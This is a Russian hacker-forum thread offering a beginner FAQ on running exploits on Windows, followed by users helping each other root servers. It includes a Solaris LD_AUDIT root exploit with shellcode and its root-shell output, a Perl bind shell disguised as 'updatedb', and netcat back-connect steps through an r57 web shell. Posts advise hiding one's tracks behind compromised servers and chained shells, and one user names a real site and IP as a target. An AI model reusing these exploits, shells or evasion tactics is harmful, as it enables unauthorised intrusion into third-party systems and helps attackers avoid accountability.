Скорее это не статья, а небольшой faq по запуску различных сплойтов.
Решил напмсать об этом ибо очень много вопросов на форуме на эту тему.
Итак...

PERL сплойты
Для запуска качаем ActivePerl (http://downloads.activestate.com/ActivePerl/Windows/5.8/ActivePerl-5.8.7.815-MSWin32-x86-211909.msi).устанавливаем.
Дальше открываем командну строку (Пуск>Выполнить>cmd) и переходим в папку с сплойтом ("cd папка") дальше пишем

"perl sploit.pl" (без ковычек).

Вот и всё! Запустицца сплоит и выдаст всю необходимую информацию по его использованию.
P.s. Что бы .txt (или любой другой) фаил переименовать в .pl (или в любое другое расширение) можно воспользоваться командой "ren" (в папке с сплойтом "ren sploit.txt sploit.pl")

PHP сплойты
1) Качаем PHP (http://ru.php.net/distributions/php-5.2.0-win32-installer.msi) (Впринцепе он есть и в Денвере и VertrigoServ можно юзать от туда)
Опятьже открываем командну строку (Пуск>Выполнить>cmd) далее пишем

"полный_путь_до_php.exe полный_путь_до_sploit.php" (Например: C:\PHP\php.exe C:\sploits\sploit.php)

Дальше всё анологично перловым сплойтам.

2) Качаем php2exe (http://webfile.ru/2199849) от BUG(O)R'a. и php5ts_5_0 (http://depositfiles.com/files/7647848) или php5ts_5_1 (http://depositfiles.com/files/7647901)
копируем dll'ки из архива в папку с программой и в папку system32
Запускаем... Жамкаем на кнопку "..." и выбираем наш sploit.php
Затем жмём "Convert" и выбираем имя (Например: sploit2exe) и место расположение будущего сплойта.
Тыкаем "Сохранить" у нас появляется новый фаил (slpoit2exe.exe)
Открываем ком. строку переходим в папку где у нас лежит slpoit2exe.exe и просто пишем "slpoit2exe.exe"
Запустица сплойт!


Си сплойты
Качаем lcc-win32 (http://weloads.com/coding/c/75304dloadcur.html) устанавливаем.
Копируем сплойт (sploit.c) в папку где находится lcc.exe (C:/icc/bin)
Далее запускаем консоль (Пуск->Выполнить->cmd) переходим в папку с эксплойтом и командуем:

"lcc.exe sploit.c"

в папке появится новый файл: sploit.obj
Дальше пишем слудущее:

"lcclnk.exe sploit.obj"

Теперь в папке появиться файл sploit.exe. Это и есть компиленый сплойт =)
Потом открываем ком. строку переходим в папку где у нас лежит slpoit.exe и просто пишем "slpoit.exe"
Видео (http://zxcvasd.jino-net.ru/video.rar)

Python сплойты
Качаем Python (http://www.python.org/ftp/python/2.5/python-2.5.msi)
Открываем командну строку (Пуск>Выполнить>cmd) далее пишем:

"полный_путь_до_python.exe полный_путь_до_sploit.py" (Например: C:\Python\python.exe C:\sploits\sploit.py)

Дальше всё, как у других сплойтов.


Metasploit Framework
Про этот тип сплойтов есть отличная статья от -=lebed=-'a. Читать тут (http://forum.antichat.ru/showpost.php?p=173560&postcount=1)

(c) Вся инфа собрана на просторах этого форума

Статя норм.)

а вот ссылка http://weloads.com/coding/gen/74434dloadcur.html
битая

Zitt норм статья, теперь кто будет говорить- "А как запустить сплоит я незнаб, скажите плиз а то я ламак" буду давай ссылу на твою статью! Респект!

1) Python не качается....
2) Исправь грамматические ошибки...
3) Если я не ошибаюсь, то для запуска файлов созданных программой php2exe от HungeR.ru требуется такая библиотека как php5ts.dll.

Скачать php5ts_5_0 (http://hunger.ru/files/release/php2exe/php5ts_5_0.rar) - ~1.5 мб.
Скачать php5ts_5_1 (http://hunger.ru/files/release/php2exe/php5ts_5_1.rar) - ~1.6 мб.

Забыл указать...

Конкретно нечего нового не узнал. Но за старание поставлю +2

А теперь мой вариант:
1) Берём r57 шелл, залитый на серв под никсом
2) Качаем NetCat и запускаем (nc -l -p 11457)
3) В r57 шелле нажимаем BackConnet (в настройках ничего не меняем)
4) Загружаем через шелл нужные сплойты
5) В консоли для нужного вбиваем
а) для PHP запускаем как php exploit.php
б) для Perl запускаем как perl exploit.pl
в) для C компилируем (gcc exploit.c -o exploit) и запускаем ./exploit

ЗЫ имхо гемора меньше.. но есть некая угроза со стороны серва с шеллом)

ИМХО статья посредственная!А где сказано о безопасности ?? Вот какойто умник прочитает - и запустит СУПЕР-МЕГА сплоит со своей машины - а в логах серванта его ip и останется - и ждите дядек в погонах...

Вот Тоха дело говорит, только Gcc не везде установлен

./configure (общая конфигурация)
make
make install (установка программы)
если експлоит или программа заархивированная, набирай:
tar -xvzf pack.tgz (tgz- разрешение архива, которое может меняться к примеру на bgz,gz, точно также как и виндовый zip и rar)
dpkg -i имя файла.deb (пакеты Debian)
rpm -ivh имя файла.rpm (пакеты rmp)
(для С):
gcc file.c -o file (скомпилировать файл file.c и получить на выходе бинарник file )
file (параметры) - запуск
(для перла):
perl file.pl (скомпилить перловский файл)
Для того, чтобы его запустить:
file.pl (запуск)

r0cha!
ну есть ещё и cc+)

Учёл всё выше сказанное. Поправил сцылки, добавил про php.
Sov1et, при чём тут безопасность? Я не о ней писал! Это тема другой статьи

Отличная статья )

Для новичкоф в самый раз!

Коротко и просто!
Впредь шлите с такими вопросами... сюда :)

Статья для новичков просто супер, надеюсь топиков Как запустить експлоит станет меньше. Автору +.

О.. наконец-то я научился... )))))))
2Zitt На будущее: Чтобы уйти в корневой каталог используюй cd\ а не cd ..

Скорее это не статья, а небольшой faq
FAQ нормальный, добавь про запуск сплоитов от Metasploit Framework (сплоитов уже более ста, расширение у них .pm, написаны специально для пакета, а так почти как на Перле)

В плане собственной безопасности удобнее, конечно, сплоиты запускать не со своей машины, а непосредственно с шелла. (читать пост тохи (http://forum.antichat.ru/showpost.php?p=217087&postcount=6) )

Во-первых, при атаке вы спалите айпи серванта, на котором вы запускали сплоит, а не своего домашнего компьютера (особенно если айпи выделеннный - то вас за жабры быстро возьмут).

Во-вторых, вы используете бэкконнект, следовательно и доказать, что это вы использовали сплоит будет сложнее (ведь по логам серв сам к вам подключился - можно просто сделать глупое выражение лица и сказать, что не знаете, зачем он к вам постучался на порт).

В-третьих, все-таки не нужно заморачиваться и терять время на установку компиляторов и интерпретаторов, на хостингах это все давно есть и ждет вашего внимания.

З.ы
Никто не пробовал другой безумный способ?:
- соединиться к шеллу номер 1 (если файрволл на стороне сервера пропустит прямое соединение - иначе через бэкконнект, но тогда айпишник спалим, хотя доказывать замаются) через sockscap+putty
- открыть порт на шелле номер 1 и поставить на режим ожидания неткатом
- зайти на веб-шелл (не без прокси ессно) и поставить бэкконнект на шелл номер 1
- работать через шелл номер 1 через путти+сокскап

Итого: вроде нигде свой айпишник не палим, да и в цепочке добавлено промежуточное звено, отследить будет куда сложнее.

.::Gh0st::. - в любом случае надо делать глупое лицо и грить что тя протроянили

Молодец.. пригодилоось))

Взял на пробу такой эксплойт: http://forum.antichat.ru/threadnav25249-1-10.html

нашел инструкцию: http://forum.antichat.ru/threadnav26510-1-10.html

далее нашел вот это:

Usage: php '.$argv[0].' host path OPTIONS
host: target server (ip/hostname)
path: path to PHPFusion
Options:
-T[prefix: specify a table prefix (default: fusion_)
-p[port]: specify a port other than 80
-P[ip:port]: specify a proxy
Examples:
php '.$argv[0].' localhost /fusion/
php '.$argv[0].' localhost /fusion/ -p81
php '.$argv[0].' localhost / -P1.1.1.1:80

цель выбрал эту - www.conadsis.com (IP: 70.86.20.18)

php у меня на c:\php\php.exe там же и sploit.php

пишу по инструкции (cmd):

c:\php\php.exe c:\php\sploit.php '.$argv[0].' 70.86.20.18
или
c:\php\php.exe c:\php\sploit.php '.$argv[0].' www.conadsis.com

получаю какую-то херню ввиде прокрутки текста эксплойта.

В чем ошибка? Правильно ли записываю аргументы? Может быт при инсталяции php надо указывать какие-нибудь опции?

P.S. Пробую впервые, для спортивного интересу, php и perl не знаю, но, вроде, по написаному ничего сложного нет.

Такая же проблема, не разобрался с php сплойтом, тже выдаёт весь php код, как же правильно запускать?

memo, посмотри внимательнее usage, там не только сайт надо указать, но и папку с /fusion/ т.е. со скриптом, мб в этой трабла? и чё-то меня этот аргумент в чистом виде не вдохновляет)) хотя хз, не юзал)

я фигею статья норм для нубов пусть учатся--- но почему статья как запускать сплойты под виндой в ращделе сервера -- динукс --- вопрос на засыпку

genom--
Потому что большинство сплойтов ориентировано на *nix-системы, и люди именно в этих ветках и ищут ответы на свои вопросы.

могу видео снять по установке и запуску предпологаемых експлойтов смотреть будите ?

ground_zero
Зачем? Итак ведь все описано и разжевано.

Во-вторых, вы используете бэкконнект, следовательно и доказать, что это вы использовали сплоит будет сложнее (ведь по логам серв сам к вам подключился - можно просто сделать глупое выражение лица и сказать, что не знаете, зачем он к вам постучался на порт).

Ппц как неактуально - тратишь лишние 50$/месяц - покупаешь VPN от ачата + проксисы (от.... "здесь млга быть Ваша реклама") - и не недо ипацца с логами.
PS: нет повести печальнее на свете, тьфу... нет паливнее способа, чем юзать сплоиты со своей машины под любым IP изначально.

могу видео снять по установке и запуску предпологаемых експлойтов смотреть будите ?

Снямешь видео - плюсы и респекты - в приницпе видео не тяжелое, но полезное - как в плане актуальности, так и в плане обновления раздела видео.

Эм... наверное "сильно" тупой вопрос- Как убрать защиту от таких как я(скрипткидис вроде зовется =)), а то на С скачал сплоит... а он не компилируется(это вроде бы так называется =)) =/

Эм... наверное "сильно" тупой вопрос- Как убрать защиту от таких как я(скрипткидис вроде зовется =)), а то на С скачал сплоит... а он не компилируется(это вроде бы так называется =)) =/

Учить Си. В каждом сплойте разные ошибки, где-то кавычка в другую сторону, где буква в операторе пропущена. А вообще, пробуй компилировать, смотри, на какие строки ругается компилятор, бери справочник и сверяй.

Ок... спасибо =)

Учить Си. В каждом сплойте разные ошибки, где-то кавычка в другую сторону, где буква в операторе пропущена. А вообще, пробуй компилировать, смотри, на какие строки ругается компилятор, бери справочник и сверяй.
после такой компиляции со справочником этот сплойт привратитса во что угодно вплоть до эмулятора os/2 но только не експлойт =))) а вот учи С это на самом деле полезный совет .

Подскажите плз.
Нашел сплоит для SunOS 5.10, не понимаю как пользаваться. Эт тип PoC код какой-то.

atari:venglin:~> cat dupa.c
static char sh[] =
"\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\
x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x
01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe
8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68
\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\
x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x
04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xf
f";

int la_version() {
void (*f)();
f = (void*)sh;
f();
return 3;
}
atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c
atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so
atari:venglin:~> su
# id
uid=0(root) gid=10(staff)

Создаешь файл dupa.c со следующим содержанием:

static char sh[] =
"\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\
x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x
01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe
8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68
\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\
x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x
04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xf
f";

int la_version() {
void (*f)();
f = (void*)sh;
f();
return 3;
}

Компилируешь:
gcc -fPIC -shared -o /tmp/dupa.so dupa.c
Собираешь:
setenv LD_AUDIT /tmp/dupa.so

А его обязательно компилить и собирать на удаленой машине или откомпилировать можно у себя?

Bac9l
Желательно на удаленной, хотя в некоторых случаях возможно и на локальной (зависит от сплойта).

1. Linux 2.4.25 SMP
2. Права nobody.
Судя по всему, может порутать только uslibpr.c.
Собрал, запускаю:

./libr -d 0

[+] SLAB cleanup
child 1 VMAs 124
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xe7800000 - 0xffffd000
Wait... -
[+] race won maps=211

И так и висит. Вопрос - это нормально, или сплойт повис?:)))

P.S. Без параметра -d 0 выплевывает ошибку после Wait.

выплевывает ошибку после Wait.
значит время для ожидания выполнения закончено нет конекта с сервером или код в установленный промежуток выполнить не удалось .

ground_zero, это во втором случае, если без -d 0. А что с первым?

нет не нормально если он самом деле висит как ты говориш а не выполняетса =)))

2.4.21-47.0.1.el тоже не порутилось, я так понимаю из-за того что пропатчено?

сплоент павис. зопускайте исчо рас.

сплоент павис. зопускайте исчо рас.

может мне его еще в cron добавить? =)

Просто сплойт не сработает на этой системе. Вот и все.

Может оффтоп, но: есть что нибудь рабочее под SunOS 5.8 ?

gcc забеги на http://www.milw0rm.com/ там много чево есть практически под всё и временами даже рабочее =)))

2ground_zero, спасибо, но я просил не сайт с кучей сплоетов, а реально проверенный кем то из форумчан код. =)
Могу вас заверить, что всю ночь до этого гуглил в поисках сабжа. И на милворме тоже был. причем в первую очередь.

P.S. В данном случае еще и архитектура sparc =)

вот решил заняться и сразу проб.
незнал где спросить(в каком топике)решил тут
короче есть шелл r57shell 1.31 с правами на запись
я перехожу в папку sources и заливаю bind_port.pl
потом выполняю команду perl bind_port.pl
и жду жду и жду!и не че !зависло .пишет ожидает ответа с www.....
в чём проблема? подскажите! может что-то не правильно делаю?

perl bind_port.pl ip port
и еще у себя не забудь откріть порт с помощью нет какта -l -p port .И указывай реальный свой ip а НЕ прокси

та тут вобше не выполняется perl
или с начало надо на нет скане а потом пёрл-бин запускать
подскажите плызз

nobi, попробуй с помощью шелла порт открыть. Читай пост тохи на первой странице темы

та тут вобше не выполняется perl
или с начало надо на нет скане а потом пёрл-бин запускать
подскажите плызз
bind.pl
perl /путь_до_скрипта/bind.pl
потом с помощью putty или тот же NetCat => конектишься

#!/usr/bin/perl

$port = 32767;
$port = $ARGV[0] if $ARGV[0];
exit if fork;
$0 = "updatedb" . " " x100;
$SIG{CHLD} = 'IGNORE';
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in($port, INADDR_ANY));
listen(S, 50);
while(1)
{
accept(X, S);
unless(fork)
{
open STDIN, "<&X";
open STDOUT, ">&X";
open STDERR, ">&X";
close X;
exec("/bin/sh");
}
close X;
}

NetCat => ip_адресс_ресурса 32767 (enter)
putty => Host Name (or IP address) там пишим IP_адрес_ресурса(можно и просто адресс ресурса) => Port 32767 => OPEN
скрин (http://www.attack.jino-net.ru/p.jpg)

Есть сплоент на С
Лежит тут (скачал только по первой сссылке)
http://www.514.es/Microsoft_Dns_Server_Exploit.zip
http://www.48bits.com/exploits/dnsxpl.rar
http://www.milw0rm.com/sploits/04152007-dnsxpl.rar
(в архиве 4 файла Makefile, dnsxpl.Acf, dnsxplc.c, dnsxpl.Idl)
Вопрос: я локально его не соберу у себя на компе под виндой? lcc-win32 ? (http://www.cs.virginia.edu/~lcc-win32/lccwin32.exe) Пробовал компилить выдаёт 260 ошибок.
Пробовал переименовать dnsxpl.Idl в dnsxpl.h в папке includ - всё равно ошибки.

P.S. Он наверно для никсов (исходник то, раз makefile есть) и я зря под виндой пытаюсь ?

попробуй откомпилить под cygwin (http://cygwin.com/)'ом. компилит юниксовые сплоиты в *.exe

Этот эксплоит сосвем не для *nix. собирается, по идее, он вполне нормально под Windows.
dnsxpl.Idl - это файл interface defenition language (языка описания интерфейса). А насчёт makefile - жжоте =) Кто ж сказал что если makefile, то под никсы...

UPD: однако собрать у меня тоже не получилось. Кроме того смущает наличие в сырцах:
#include "dnsxpl.h"
который отсутствует в архиве.

Дайте мне dns сервер вынь 2003 En - кому не жалко, затестю слоит от MSF 3.0 :D

Кроме того смущает наличие в сырцах:
#include "dnsxpl.h"
который отсутствует в архиве.

Точнее во всех трёх архивах... ;)

значит эта библиотека где-то должна быть!? В каком-то компиляторе ?

Точнее во всех трёх архивах... ;)

значит эта библиотека где-то должна быть!? В каком-то компиляторе ?
Агррр... сам догадаешься или подсказать?!
dnsxpl сокращение от DNS EXPLOIT. На самом деле эта библиотека там нах ненужна. Прототипы функций уже указанны.

Я вот не мойму, кроме ShadOS, исходники кто-нибудь посмотрел ? Я Си в школе узучал ещё и то поверхностно, щас даже синтаксис плохо помню, но, посмотрев код, там любой дурак (хоть кто более-менее знаком с программированием, поймёт, что что-то не так с dnsxpl.h. Придётся править сплоит самому полностю... (хотя бы добьюсь чтоб скомпилировался). В определении переменных - тоже ошибки, да и не соответствие типов имеет место... Где ВЫ кодеры на Cи - помогите сплоит подправить... ;)

#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#include <winsock.h>
#pragma comment(lib,"ws2_32")

int __RPC_FAR; __RPC_USER; midl_user_allocate(size_t len){ return(malloc(len)); }
int __midl_user_free(void __RPC_FAR ptr){ free(ptr); }
int fingerprint (char host);
BYTE find_jmp (BYTE lpAddress, DWORD dwSize);



C:\lcc\bin>lcc.exe dnsxplc.c
Warning dnsxplc.c: 77 no type specified. Defaulting to int
Warning dnsxplc.c: 77 no type specified. Defaulting to int
Error dnsxplc.c: 77 illegal return type; found 'pointer to void' expected 'int'

Неправильный тип возвращается, ожидался указатель возврата целочисленный

Up: Ага * - значит указатель... начнём править всё сначала :)



#include <stdio.h>
#include <stdlib.h>
#include <ctype.h>
#include "dnsxpl.h" - в топку, чтоб компилер не ругался...
#include <winsock.h>
#pragma comment(lib,"ws2_32")

void __RPC_FAR * __RPC_USER midl_user_allocate(size_t len){ return(malloc(len)); }
void __RPC_USER midl_user_free(void __RPC_FAR * ptr){ free(ptr); }
int fingerprint (char *host);
BYTE * find_jmp (BYTE *lpAddress, DWORD dwSize);


* __RPC_USER вот это что указатель или нет? Если указатель, то убрать пробел, если нет то убрать *

* __RPC_USER вот это что указатель или нет? Если указатель, то убрать пробел, если нет то убрать *
MSDN смотрел? Для начала подключи
#include <rpc.h>
потом почитай вот здесь (http://msdn2.microsoft.com/en-us/library/aa374378.aspx).
так как ты написал - указатель. Если уберёшь, то нет =)
боюсь что lcc здесь не поможет. Ставь visual studio или качай хотя бы компилятор. Ищи на сайте мелкомягких Redistributional packadge.

Вопрос - в какой расширение сохранить и как запустить
#!/usr/bin/php5-cgi -q

Вопрос - в какой расширение сохранить и как запустить
#!/usr/bin/php5-cgi -q
php xpl.php

Такой вопрос: имеется сплойт на С, компюли его, получаю *.exe, а вот что дальше то с ним делать надо.., пробовал запускать через командную строку.., ну вроде работает.. вот только че делать с ним..
Имеется vds лучше через нее..

>>>>вот только че делать с ним..
ПРи запуске обычно выводицца инфа как его юзать... Пакеж сплоетн...

вот.. http://securityvulns.ru/news/Opera/TorrentBO.html

To -=lebed=-: Если для тебя всё ещё актуальна тема про сплоит который ты не мог скомпилить то бери отсюда http://ifolder.ru/2976747 Пришлось попатеть :)

Сделал я это так.

В сплоите есть Makefile и с помощью него всё и собирается. Для того чтобы собрать нужно дать команду nmake /f Makefile, но есть очень много НО.

Так как я пользуюсь очень редко ручной сборкой с помощью cl.exe и линковкой то у папка где они лежат не добавлена в переменную окружения PATH, ведь нужно ещё будет добавить путь и к nmake и к midl так что я при компиляции устраняю все зависимоси бросив всё в одну папку(мне так удобнее дабо делаю я это ооооочень редко).Когда я все зависимости уладил у меня в одной папке лежали куча динамических библиотек, cl.exe link.exe nmake.exe midl.exe это всё что нужно для сборки.

Выполнил nmake /f Makefile, получил первую ошибку, что компилятор не может найти путь к stdio.h. Решается это просто. Командой set нужно добавить к переменным окружения новую переменную INCLUDE. Поиском можно найти файл stdio.h и добавить потом папку где он лежит добавить в переменную окружения так set INCLUDE=C:\PATH\TO\HEADERS

Ещё раз nmake /f Makefile и опять ошибка но теперь не может найти rpc.h, ищу его, ага нашёл добавил в переменную окружения set INCLUDE=C:\PATH\TO\HEADERS\;C:\PATH\TO\HEADERS2
Это важно добавить и первую и вторую папки так как переменная окружения не обновляется и заменяется так что добавил всё через ;

Выполнил ещё раз nmake /f Makefile

Теперь ругнулся линковщик что не может он найти такую то библиотеку. Это можно решить путём добавляния переменной окружения LIB добавив в неё путь где лежит недостающая библиотека.
set LIB=C:\PATH\TO\LIB

Выполнил nmake /f Makefile и опять была ошибка, опять линковщику не хватало. Нашёл файл и добавил к переменную окружения LIB.

set LIB=C:\PATH\TO\LIB\;C:\PATH\TO\LIB2

Ещё раз nmake /f Makefile и теперь всё без ошибок прошло. Появились обьектные файлы, сам exe, manifest, и дебаг информация. Всё в папке подчистил и вернул на свои места. Я думаю многие сталкивались с проблемой компиляции под винду из консоли, может комуто моя писанина и пригодится :)

To ShadOS: Кстати там нужен файл dnsxpl.h и всё там вроде правильно, он у меня получился после midl. И стоит он в "" значит берётся из текущей директории, так что хз у меня всё скомпилилось и файл этот был :)

Здравсвтуйте, прошу мощи, т.к. ещё не опытный в рутование.Встретились небольшие трудности
Сделал бэк конект, залил сплойт http://milw0rm.com/exploits/4172
Но не компилиццо :(

Linux 2.6.17-1.2142_FC4smp #1 SMP Tue Jul 11 22:57:02 EDT 20
06 i686 i686 i386 GNU/Linux
uid=831(web99) gid=831(web99) groups=501(confixx),831(web99)
gcc n.c -o n
n.c: In function 'main':
n.c:27: error: 'IPV6_2292PKTOPTIONS' undeclared (first use in this function)
n.c:27: error: (Each undeclared identifier is reported only once
n.c:27: error: for each function it appears in.)
n.c:62:2: warning: no newline at end of file

Прощу помощи :( Блин, попытался прописать эту функцию, но нифига не пашет.
Основы си знаю... но не так глубоко

Ipv6_2292pktoptions это не функция а число...)
это сплойт не для получения рута, сплойт для мапинга памяти ...)
не получается скомпилить там попробуй скомплить локально...)
возможно что там умышленно нет каких то либ с этими константами... найди значение константы и пропиши её, и попрбуй скомпилить...

//update ошибся в название )

Народ, избавился от первых двух ошибок путём декларирования
#define IPV6_2292PKTOPTIONS 2
Но, осталась последняя ошибка :( как избавиться от
n.c:62:2: warning: no newline at end of file
ПОМОГИТЕ плз, уже и незнаю что делать, перерыл инфу (в основном на английском), но так и не понял в чём проблема. Что-то связанное с EOF... но хз.

Eof это означает конец файла..) и ещё это не ошибка а варнинг так что бинарник ты получил...
а избивится можно так, в конце файла сделай ещё 1 перенос строки)

Народ :) вообщем, совсем недавно получил свой первый рут :)) доволен как парасёнок :)
Но, вот, теперь появилась очередная проблема. Достал веб шелл с правами на запись но сключённым сейф модом...
Сделал бэк конект, залил brk2, brk ... спойт запускается, но не рутается :(( Подскажите каким сплойтом лушче воспользоваться

Ыoftware: Apache/2.0.48 (Linux/SuSE). PHP/4.3.11
uname -a: Linux 2.4.21-243-default #1 Thu Aug 12 15:22:14 UTC 2004 i686
uid=30(wwwrun) gid=501(ftponly) groups=501(ftponly)
Safe-mode: ON (secure)

В статье не упомянули одну вещь - запуск *.sh эксплоитов.
Как запускать. Для запуска нужна любая unix-подобная система.
Заходим в консоль.
Командуем "sh". После этого должна появиться строка типа: "sh-3.00"
и дальше просто перетаскиваем наш эксплоит в командую строку.
В итоге у нас должно появиться что-то типа:
sh-3.00# '/root/Desktop/2.sh'

sh ./hek.sh

Качаем PHP (http://ru.php.net/distributions/php-5.2.0-win32-installer.msi) (Впринцепе он есть и в Денвере и VertrigoServ можно юзать от туда)
2) Качаем php2exe (http://hunger.ru/files/release/php2exe/php2exe.rar) от BUG(O)R'a. и php5ts_5_0 (http://hunger.ru/files/release/php2exe/php5ts_5_0.rar) или php5ts_5_1 (http://hunger.ru/files/release/php2exe/php5ts_5_1.rar)


У кого-нибудь есть рабочие ссылки?Или может кто по доброте душевной зальёт на каком-нибудь фаилообменник?
Заранее мерси.

прошу простить если не туда... В общем есть сплоит под апач, тока вот система не совпадает. В сплоите есть коммент:
# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at
# 0x0834ae77 for any other version/system find it.
Мне надо узнать этот адрес для Etch'a. Можете подсказать как этот адрес найти? Хотя бы примерную схему, или где почитать?

прошу простить если не туда... В общем есть сплоит под апач, тока вот система не совпадает. В сплоите есть коммент:
# Shellcode address in heap memory on apache 1.3.34 (debian sarge) is at
# 0x0834ae77 for any other version/system find it.
Мне надо узнать этот адрес для Etch'a. Можете подсказать как этот адрес найти? Хотя бы примерную схему, или где почитать?
Дебажить самому

У кого-нибудь есть рабочие ссылки?Или может кто по доброте душевной зальёт на каком-нибудь фаилообменник?
Заранее мерси.
Держи...
http://webfile.ru/2199849 -- php2exe
http://depositfiles.com/files/7647848 -- phpts5.0
http://depositfiles.com/files/7647901 -- phpts5.1

Вот 1 вопрос, я установил Active perl. Зашёл в кмп, пишу:

perl sploit.pl

Вместо sploit.pl указывать путь к сплоиту? К примеру D:\sploitl.pl ?

а что должно отоброзиться если я всё сделал правильно, а то вот я в cmd строке ввожу всё что надо и в ней же появляеться весь текст эксплоита и ничего не меняеться?

FunkFan, на чем сплойт??

http://webfile.ru/2199849 - сдохла ссыла php2exe
Залейтке кто нибудь плиз!

http://depositfiles.com/files/u3juhfyll

FunkFan, уточни на счёт языка на котором написан сплойт, есть вероятность что у тебя не запущен интерпритатор..

Вот 1 вопрос, я установил Active perl. Зашёл в кмп, пишу:

perl sploit.pl

Вместо sploit.pl указывать путь к сплоиту? К примеру D:\sploitl.pl ?

Arigona, да, если ты находишся вне папки с сплойтом!

а че тему то открепили... думаю, она и щас многим будет полезна....
ээхх, а когдла то она в избраном лежала =))

Народ, кто запускал последний AppleTalk getsockname() 8-bytes kernel stack disclosure ?

http://www.milw0rm.com/exploits/9521

У меня чет сокет не биндится, вот тут ошибка на этапе выполнения:

struct sockaddr_at sat;
int s, len = sizeof(sat), occ = 500;
char prev_zero[sizeof(sat.sat_zero)] = { 0 };

s = socket(AF_APPLETALK, SOCK_DGRAM, 0);
if ( s == -1 )
{
perror("socket");
return EXIT_FAILURE;
}

memset(&sat, 0, sizeof(sat));
sat.sat_family = AF_APPLETALK;
sat.sat_addr.s_net = htons(ATADDR_ANYNET);
sat.sat_addr.s_node = ATADDR_ANYNODE;
sat.sat_port = ATADDR_ANYPORT;

if ( bind(s, (struct sockaddr *) &sat, len) < 0 ) <<<<<<
{
perror("bind");
return EXIT_FAILURE;
}

http://depositfiles.com/files/u3juhfyll
Перезалейте плиз php2exe ссылка сдохла.
P.S. Эту http://narod.ru/disk/2538281000/php2exe.exe.html не предлагать! ;)